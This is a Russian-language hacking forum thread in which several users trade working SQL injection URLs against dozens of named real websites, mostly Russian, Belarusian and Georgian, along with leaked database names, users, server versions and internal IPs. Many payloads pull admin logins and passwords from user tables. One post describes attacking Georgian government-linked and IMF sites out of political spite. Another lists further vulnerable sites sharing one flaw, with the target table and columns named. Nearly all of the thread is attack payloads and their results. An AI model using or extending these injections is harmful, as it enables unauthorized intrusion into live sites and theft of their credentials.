http://www.bis-nk.ru/catalog/?i=6+union+select+1,2,3,4,5,6,7,8,9,table_name,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr om+information_schema.tables+--+
rus-zfond.ru
http://www.rus-zfond.ru/zfond/vacancy.php?id=-1928+union+select+1,concat_ws(0x3a3a,name,pass,uid ,permiss),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28+from+users+--+
dverinabiz.spb.ru
http://dverinabiz.spb.ru/?mod=1&id=1639024187&parent_id=-704343390+union+select+1,2,3+from+information_sche ma.tables+--+
old.nv-sv.ru
http://old.nv-sv.ru/catalog.php?mod=1&id=&parent_id=-427136016+union+select+1,2,3+--+
educasource.cndp.fr pr6
http://www.educasource.cndp.fr/detail.asp?ID=138794&IDSelection=-56586+union+select+1,table_name+from+information_s chema.tables+--+
newsensations.com pr4
http://newsensations.com/distro/catalog.php?movie=-128+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23+--+
sport.infotree.ru pr3 tic 300
http://sport.infotree.ru/index.php?m=clause&action=preview_clause&id_cl_cat=2&id_clause=-6+union+select+concat_ws(0x3a3a,e_name)+from+infor mation_schema.tables+--+
teslacenter.ru pr3
http://www.teslacenter.ru/modules/galary/galary.php?do=2&idimg=-12+union+select+1,2,3,database()+--+
antispam.ru pr5 tic 475
http://www.antispam.ru/sh?act=msg&id=-1096031090'+union+select+1,2,pass,4,5,6,login+from +users+--+
technokhleb.ru pr4
http://www.technokhleb.ru/cat_section.php?id_level=-3138+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40+from+informa tion_schema.tables+--+&var=1
sten-mat.ru pr3
http://sten-mat.ru/?page=catbig&goods=2&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
havana.ru pr3
http://www.havana.ru/shop.php?brandid=-106+union+select+1,group_concat(table_name)+from+i nformation_schema.tables+group+by+table_schema+--+
hawthornpress.com pr4
http://www.hawthornpress.com/book.php?isbn=-9781903458327+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+/*+
http://www.bluetoothclub.ru/bc.php?Id=-1)+UNION+SELECT+concat(VERSION(),0x3a,USER(),0x3a, DATABASE())%23
5.0.67-log:u14016@10.10.223.239:u14016_2
========
buychaosmen.com pr2
ололо, чо ты делал на том сайте
http://www.itar-tasskuban.ru/news.php?news=-2302'+union+select+1,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)/*
Database Version: 4.0.26-log
Database name: udb4898
User name: Uwww4898S@localhost
Os : portbld-freebsd4.10
http://www.diablo-ii.ru/index.php?option=com_remository&Itemid=S&func=selectcat&cat=-9/**/union/**/select/**/0,0,0,0,concat_ws%280x3a,username,password,usertyp e%29,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2/**/from/**/mos_users/**/where/**/usertype%20!=%27%27/*
http://www.pets.by/articles.php?id=-1+Union+select+1,2,3,4,5+--+
database: petsby_pet
user: petsby_pet@localhost
version: 5.0.45-log
http://www.aids.by/article.php?lib_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8+--+
user: aidsby@localhost
version: 5.0.51a-24+lenny1-log
database: aidsby
Вступление:
Сижу я как-то на лекции и обсуждаем всякую дрянь (политику). Наверное ничего примечательного бы не произошло, если бы 2 грузиночки, сидящие неподалеку от меня, не открыли тему войны, а в частности, Грузия vs. Южная Осетия... Цитата: "Почему Россия всегда ВМЕШИВАЕТСЯ в дела Грузии? Южная Осетия это наша территория..." и тд. и тп. Ну, что поделаешь, когда государство тупо, по американскому образцу, промывает своим гражданам головы? Они не виноваты, но вот их правительство... И я решил, как могу, если не наказать, то по крайней мере навредить домену .ge (не бесцельно, а наехав на госструктуры). Результат моей самоотверженной работы:
http://www.gvg.ge/
(проект здравоохранения Грузии, финансируемый Европейским Союзом)
http://www.gvg.ge/pages.php?pid=-2'+UNION+SELECT+1,2,concat_ws(0x3a,user(),database (),version())+--+
gvg@localhost:gvg:4.0.27
http://www.gvg.ge/pages.php?pid=-2'+UNION+SELECT+1,2,concat_ws(0x3a,username,passwo rd)+FROM+admin+--+
http://imf.ge/
(представительство Международного Валютного Фонда в Грузии)
http://imf.ge/view2.php?lang=2&view=-415+UNION+SELECT+concat_ws(0x3a,user(),database(), version()),2,3,4,5,6,7,8+FROM+admin+--+
xml@localhost:xml:4.0.27
http://imf.ge/view2.php?lang=2&view=-415+UNION+SELECT+concat_ws(0x3a,user,pass),2,3,4,5 ,6,7,8+FROM+admin+--+
Белорусская федерация легкой атлетики)
http://www.bfla.eu/index.php?action=page&id_page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
database: bflaeu
version: 5.0.51a-24+lenny1-log
user: bflaeu@localhost
Кадровое агенство)))
http://www.ko.by/index.php?page=6&id=-1+union+select+1,2,3,4+--+
user: root@localhost
version: 5.0.41:
database: konet
http://www.cl.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25+--+
version: 5.0.81-COMMUNITY-LOG
database: MULTICOM_MAIN
user: MULTICOM_ALEX@LOCALHOST
http://www.ios.by/remont/job/vacanse_res.php?id=-1+UNION+SELECT+1,2,3,version(),database(),user(),7 ,8,9,10,11,12,13+--+
database: iosby_db1
user: iosby_user@localhost
version: 5.0.86-percona-highperf-b19
[Feldmarschall]
12.02.2010, 02:45
www.koolance.com
http://www.koolance.com/water-cooling/product_info.php?product_id=489+union+select+table _name+from+information_schema.tables+limit+0,1+--+
www.davidmorgan.com
http://www.davidmorgan.com/product_info.php?products_id=805+union+select+1,2, 3,4,5,6,7,8,9,10+limit+0,1+--+
http://www.artbox.by/goods.php?category=-1+UNION+SELECT+1,2,3+--+
user: artboxby@localhost
version: 5.0.30-Debian_3
database: artboxby
http://www.menskbike.com/index.php?PageToGo=articles&article_id=-1+UNION+SELECT+1,2,3,4+--+
user: menskbikecom@localhost
version: 5.0.51a-24+lenny2-log
database: menskbikecom
http://www.belaquilon.by/page.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
user: belaquilon@localhost
version: 5.1.34-community-log
database: victor_belaquilon
http://veyron.by/page.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
user: siteis_user@localhost
version: 4.1.22-standard
database: siteis_siteis
http://www.pygmalion.by/page.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
user: pygmalio_alex@localhost
version: 5.0.81-community-log
database: pygmalio_main
http://vip-study.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+--+
user: vipstudy_by@localhost
version: 5.0.51a-24+lenny1-log
database: vipstudy_by
http://www.castingcentr.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+--+
user: castingcentrby@localhost
version: 5.0.51-3-log
database: castingcentrby
http://www.plenki.by/news-page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
user: bestshop@localhost
version: 5.1.34-community-log
database: bestshop_plenki
http://www.mgmotor.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
user: siteis_user@localhost
version: 4.1.22-standard
database: siteis_siteis
http://www.priborcom.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
user: priborco_alex@localhost
version: 5.0.86-percona-highperf-b19
database: priborco_main
http://www.eaglesports.ru/ru/news/index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
database: eaglesport_main
user: eaglesport_alex@localhost
version: 5.0.51a
http://www.aksinterier.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
database: aksinter_aksinterier
user: aksinter_aks@localhost
version: 4.1.22-standard
Газета "Звязда"=)
http://www.zviazda.by/ru/issue/rubric.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
database: zvyazdaminskby
user: zvyazdaminskby@localhost
version: 5.0.45-Debian_1-log
Пришлось как-то странно извратиться)
http://www.vales.by/catalog.php?action=show_object&id=-1+union+select+concat(0x3a,user())+--+
user: valesby@localhost
database: valesby
version: 5.0.89
nemaniak
12.02.2010, 20:13
bordeauxdogs.de PR-2
http://www.bordeauxdogs.de/guestbook/index.php?page=20&orderlinks=+and+1=0+union+select+concat_ws%280x3a, version%28%29,user%28%29,database%28%29%29,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 +--+&perpage=10 POST
4.0.27-max:bordeauxdoggen@212.48.104.25:db134450002
maskimxul.nl PR-2
http://www.maskimxul.nl/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+concat_ws%280x3a, version%28%29,user%28%29,database%28%29%29,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 +--+&perpage=10 POST
5.0.67:maskimxul_mx@localhost:maskimxul_mx
Ещё один=)
http://www.resort.club-crosswind.com/index.php?parent=0&issue_id=-1+and+1=0+Union+Select+1,2,CONCAT(0x3a,version()), 4,5,6+--+
version: 5.0.51a-24+lenny1-log
database: clubcrosswindcom
user: clubcrosswindcom@localhost
PR5
http://www.wac.ucla.edu/person.php?pid=19'+and+1=0+union+select+1,2,concat _ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24+from+user--+
Version: 5.0.77-log
User: wacsys@web2950.arts.ucla.edu
DataBase: wac
http://www.cadoganhall.com/showpage.php?pid=1116+and+1=0+union+select+1,2,3,v ersion(),5,6,7,8,9,10,11,12,13,14,15--+
Version: 4.0.27-max-log
User: dbo125879966@212.227.119.154
DataBase: db125879966
http://www.project-dream.com/index.php?pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Version: 5.0.83-log
Database: project-_dream
User: project-_dream@boscgi0701.eigbox.net
OS: unknown-linux-gnu
http://www.grinaker-lta.com/index.php?pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25--
http://www.svrwheels.ru/index.php?pageId=-1+union+select+1,2,3,4,5,6,7,8,9,10--
Version: 5.0.45-log
Database: svrwheels
User: svrwheels@localhost
OS: redhat-linux-gnu
http://203.170.87.153/~brookfi1/products.php?id=null%27+and+1=2+union+select+1,gro up_concat%28id,0x3a,username,0x3a,password%29,3,4, 5,6,7,8,9,10,11,12,13,14,15,16+from+userindex--%20-&r=null
Leone_510
13.02.2010, 18:41
http://fotik.com/good.php?good_id=-39674+UNION+SELECT+CONCAT(user_name,0x3b,user_pass )+FROM+users+LIMIT+0,1--
http://almazserv.ru/product.php?good_id=-1+union+select+1--
Version: 5.0.89
Database: almaz
User: almaz_db@localhost
OS: portbld-freebsd6.3
http://www.act.by/ru/products/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20+--+
version: 5.0.86-percona-highperf-b19
database:actby_main
user: actby_alex@localhost
fenixelite
14.02.2010, 10:17
http://art-gid.ru/forum/?nid=-2396+Union+Select+1,2,3,4,5--
version : 4.0.23a-log
user: artgid_art@localhost
Database : db_artgid_art
http://x-traz.ru/index.php?n_page=9&id_s=4+union+select+1,2,3,4,5,6,7,8,9+--+
http://x-traz.ru/index.php?n_page=9&id_s=4+union+select+1,2,3,concat%28login,0x3a,pass word%29,5,6,7,8,9+from+users%20+--+
edlinx_xtraz 5.0.45
edlinx_xtraz@localhost
http://diving.lalov.net/index.php?s=10&lang=ru+union+select+1,2,3,4,5,6+--+
divetsentr@localhost
diving 5.0.51a-log
http://www.4x4styling.com/shop2/druckansicht.php?s=13%20and%201=2%20union%20select %201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from %20tadminlogin--
http://www.playerstore.ch/druckansicht.php?s=13%20and%201=2%20union%20select %201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from %20tadminlogin--
http://www.martinbechter.com/shop/druckansicht.php?s=13%20and%201=2%20union%20select %201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from %20tadminlogin--
http://www.hts-lifestyle.at/shop/druckansicht.php?s=13%20and%201=2%20union%20select %201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from %20tadminlogin--
http://www.jet.by/?page=1&cat_id=-1+union+select+1,2,3,4,5,6,7,8+--+
version: 5.0.67-log
database: jetdb
user: jetdb@localhost
http://www.stgeorges.co.zw/shortfacts.php?id=-1+union+select+0,1,2,3--
Version: 5.0.32-Debian_7etch10-log
Database: stgeorges
User: stgeorges@localhost
OS: pc-linux-gnu
Ещё немного Зимбабве:
http://www.fwm.co.zw/orderproducts.php?id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( ),database(),user(),@@version_compile_os))),3,4,5, 6--
Version: 4.1.11
Database: fwmdb
User: fwmadmin@localhost
OS: redhat-linux-gnu
http://www.613613.ru/catalog.php?id=-1+UNION+SELECT+1,2,3,4,5,6,concat(version(),0x3a,d atabase(),0x3a,user()),8,9,10+--+
5.0.89-community-log:f613613r_db:f613613r_user@localhost
http://www.nuovimondi.com/prod_detail.php?id=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12+--+
5.0.82sp1-log:Sql257013@62.149.141.160:Sql257013_3
Непонимаю я етот язык)
http://www.worknet.com.cn/prod_detail.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5+--+
4.0.17-log:root@localhost:worknet
Снова на непонятном(
http://www.bjdnc.com/chn/pages/prod_detail.php?id=-1+union+select+concat(unhex(hex(version())),0x3a,u nhex(hex(user())),0x3a,unhex(hex(database())))+--+
4.1.12:dnc_f@localhost:dnc
http://www.walnrepair.com/prod_detail.php?ID=-1+union+select+1,concat(unhex(hex(version())),0x3a ,unhex(hex(user())),0x3a,unhex(hex(database()))),3 ,4,5,6,7,8,9,10,11+--+
4.1.22:walnrepa_walnrep@localhost:walnrepa_wrepair 1
както уныло скулится ((
http://www.dedicatedservers2.com.ar/classifiedads/classifiedads.html?id=5898+union+select+1,2,3,tabl e_name,5,6,7,8+from+information_schema.tables--
version : 5.0.89-community
user:sellbuy1_blox@localhost
http://www.bournemouthcc.co.uk/main/table.php?id=-1+UNION+SELECT+1--
user: bourne2_admin@localhost
version: 5.0.81-community
database: bourne2_website
http://www.jvc.fr/knowledge-list.php?id=-1+union+select+null,version(),null,null+--+
version: PostgreSQL 8.3.7 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
ах эта свадьба, свадьба .......
http://bgwedding.com/index.php?page=s_62222222+union+select+1,username, password+from+users--+
version: 5+
rz1307
Нашёл одну контору, которая занимается дизайном и разработкой сайтов, и, естестенно:
http://www.cycling.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: cyclingby
user: cyclingby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.gelatin.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: gelatinby
user: gelatinby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.gelatin.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: gelatinby
user: gelatinby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.nissan-belarus.by/page.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: nissanbelarusby
user: nissanbelarusby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.zaym.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: zaymby
user: zaymby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.omkk.by/page.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: omkkby
user: omkkby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.skpf.by/menu.php?form_id=(SELECT+*+FROM(SELECT+*+FROM(SELE CT+NAME_CONST(database(),14)a)+as+t+JOIN+(SELECT+N AME_CONST(database(),14)a)a)a)
database: skpfby
user: skpfby@localhost
version: 5.0.51a-24+lenny2+spu1
Интересующая таблица: cms_system_users
колонки: login, password
На всех сайтах!!!
file-priv =y
user:root
version: 4.....
http://dunmansec.egenie.org/notice/view_one_pop.php?notice_ID=-217+union+select+1,config_name,config_value,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+php bb_config+limit+57,1/*
И ещё:
http://www.ruralbelarus.by/menu.php?form_id=
http://zaym.by/menu.php?form_id=
http://www.milkpolys.by/menu.php?form_id=
http://www.narochbereg.by/
http://www.web-energo.by/firm.php?form_id=
http://www.narochbereg.by/menu.php?form_id=
http://www.avmir.by/product.php?form_id=
http://www.sovartus.by/menu.php?form_id=
http://www.vint.by/menu.php?form_id=
http://www.bkpp.by/menu.php?form_id=
http://www.tehnoviza.by/menu.php?form_id=
http://jurexpress.by/menu.php?form_id=
http://www.diapal.by/menu.php?form_id=
http://buzil.by/page.php?form_id=
http://www.hefter.by/menu.php?form_id=
http://www.mila-style.by/page.php?form_id=
http://www.amtechreklama.by/menu.php?form_id=
http://zub.by/menu.php?form_id=
http://www.iti.by/menu.php?form_id=
http://www.prishcepka.by/menu.php?form_id=
http://www.bva.by/menu.php?form_id=
http://cagia.by/menu.php?form_id=
http://britex.by/menu.php?form_id=
http://www.belmoris.by/news.php?form_id=
http://www.filterbel.by/menu.php?form_id=
http://ivushka.by/menu.php?form_id=
http://www.oknastyl.by/page.php?form_id=
http://gorksm.by/menu.php?form_id=
http://my-dom.by/menu.php?form_id=
http://www.dudutky.by/menu.php?form_id=
http://www.hefter.by/menu.php?form_id=
http://www.tehnoviza.by/menu.php?form_id=
На всех скуля)
http://elekt.vitebsk.by/menu.php?form_id=-1+union+select+1,2,version()+--+
database: elektvitebskby
user: elektvitebskby@localhost
version: 5.0.51a-24+lenny2+spu1
http://www.agrosemproduct.by/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version( ),0x3a,database()),3,4+--+
agrosemproductby@localhost:5.0.51a-24+lenny2+spu1:agrosemproductby
http://www.belproduct.com/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version( ),0x3a,database()),3,4+--+
belproductcom@localhost:5.1.34-community-log:belprod_php
http://www.transelektrokomplekt.by/page.php?form_id=-1+union+select+1,group_concat(user(),0x3a,version( ),0x3a,database()),3,4+--+
transelektrokomp@localhost:5.0.51a-24+lenny2+spu1:transelektrokomp
http://www.milena.by/menu.php?form_id=-1+union+select+1,2,group_concat(user(),0x3a,versio n(),0x3a,database()),4+--+
milenaby@localhost:5.0.51a-24+lenny2+spu1:milenaby
Новая пачка инъекций=)
Улыбнуло то, что когда написал idsub=-1 открылась страница с надписью "Hazker?"
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5, 6+--+&idkat=20&idsup=1
database: medaarr_kip
user: medaarr_evg@217.147.30.150
version: 4.1.22-standard-log
http://www.newtoys.ru/form_work/?id_form=-1+union+select+1,2,3,4,5+--+
database: newtoysr_main
version: 4.0.27-log
user: newtoysr_main@localhost
http://www.krim24.org.ua/index.php?comm=form&id_form=-1+union+select+1,2,3,4,group_concat(database(),0x3 a,user(),0x3a,version())+--+&text_ID=200&top_i_n=5
database: togoz212_krim24
user: togoz212@localhost
version: 5.0.89-community-log
http://www.feedex.ru/form_work/?id_form=-1+union+select+1,2,user(),4,5+--+
database: feedexru_base
user: feedexru_bear@localhost
version: 4.0.27-log
http://www.vamnadom.ru/index.php?num=-1+union+select+1,group_concat(database(),0x3a,user (),0x3a,version()),3,4,5+--+
database: vamnadom_mains
user: vamnadom_bear102@localhost
version: 5.0.77-log
http://www.inetrostov.ru/main/?fln=-1+union+select+1,2,group_concat(database(),0x3a,us er(),0x3a,version()),4+--+
database: inetrost_mnir
user: inetrost_mnbr@localhost
version: 5.0.77-log
http://fature.net/release.php?id=-1+union+select+1,2,group_concat(database(),0x3a,us er(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17+--+
database: fature_net
version: 5.0.32-Debian_7etch11-log
user: fature_net@srv117.one.com
http://www.wiebetech.com/pressreleases/release.php?id=-1+union+select+1,2,3,4,group_concat(database(),0x3 a,user(),0x3a,version()),6,7,8,9,10,11,12,13,14,15 ,16+--+
database: webphp
version: 4.1.22
user: webphp@localhost
http://www.webbyawards.com/press/press-release.php?id=-1+union+select+1,2,3,4,5+--+
database: webby_01
version: 5.0.45
user: rodger@localhost
устал(((((
http://guernseyhobbysupplies.com/shop.php?moreinfo=-1+union+select+1,2,concat(database(),0x3a,user(),0 x3a,version()),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31+--+
version: 5.0.89-COMMUNITY
database: WEB35-VMM
user: WEB35-VMM@LOCALHOST
http://www.vanzintruckaccessories.com/shop.php?product=-1+union+select+1,2,3,4,concat(database(),0x3a,user (),0x3a,ver
sion()),6,7,8,9,10,11,12,13,14,15,16,17+--+&category=
version: 5.0.67-community-nt
database: vanzin
user: vanzin@localhost
http://ism.ie/shop.php?page=category&action=view&category_id=-1+union+select+1,concat(database(),0x3a,user(),0x3 a,ver
sion()),3,4,5,6,7,8,9,10,11,12,13+--+
version: 5.0.45-community-nt
database: ism09
user: ism_admin@localhost
http://www.hotcan.com/shop.php?product=-1+union+select+1,2,concat(database(),0x3a,user(),0 x3a,version()),4,5,6,7,8+--
+
version: 5.1.34-community
database: hotcan
user: hotcan@localhost
http://eminenceonline.com/site/shop.php?pID=-1+union+select+1,2,concat(database(),0x3a,user(),0 x3a,version()),4,5,6,7
,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
version: 5.0.45
database: eminence_cmsDB
user: eminence_cms@localhost
Blind
http://www.thewcp.co.uk/shop.php?CatID=176+and+substring(version(),1,1)=4
http://www.nabatorganic.com/store.php?id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+N AME_CONST(user(),14)a)+as+t+JOIN+(SELEC
T+NAME_CONST(user(),14)a)a)a)&cat_id=13&expanddiv=13
version: 5.0.51a-3ubuntu5.4
database: nabat
user: nabat@localhost
http://www.toprxsavings.com/store/src/store.php?prog=products&a=preview&id=-1+union+select+1,concat(database(),0x3a,u
ser(),0x3a,version()),3,4,5,6,7,8,9,10,11+--+&cat=117&in_template=1&nocache=MXR1250434392QGBGAS2009/08161250434392&id
ioma=ENG
version: 4.1.22-standard
database: savings_tienda
user: savings_4dm1n@localhost
http://www.oldgaspump.com/store.php?section=1&catid=340&id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST( user(),14)a
)+as+t+JOIN+(SELECT+NAME_CONST(user(),14)a)a)a)
version: 5.0.51a-3ubuntu5.5
database: vicsplace
user: vicsplace@localhost
http://www.myesterna.com/store.php?action=showsubcat&id=-1+union+select+1,2,concat(database(),0x3a,user(),0 x3a,versio
n()),4+--+
version: 4.1.22-max-log
database: myestdb
user: myestdb@208.109.181.40
http://www.bidstant.com/store.php?id=-1+union+select+1,2,3,concat(database(),0x3a,user() ,0x3a,version()),5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36+--+
version: 5.0.67-community
database: bidstantauc
user: adminbid@localhost
http://www.houstonbluessociety.org/store.php?Id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(database( )))+--+
version: 4.1.16
database: houstonbs
user: admin@localhost
В конце исходного кода:
http://www.pbmperformance.com/store.php?catId=-1+union+select+user(),2,3,4,5,6+--+&parent=-1
version: 4.1.22-standard
database: pbmerson_main
user: pbmerson_admin@localhost
http://www.shangrila-plaza.com/store.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 +--+
version: 5.0.45
database: shangrilamall
user: shangrilamall@localhost
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot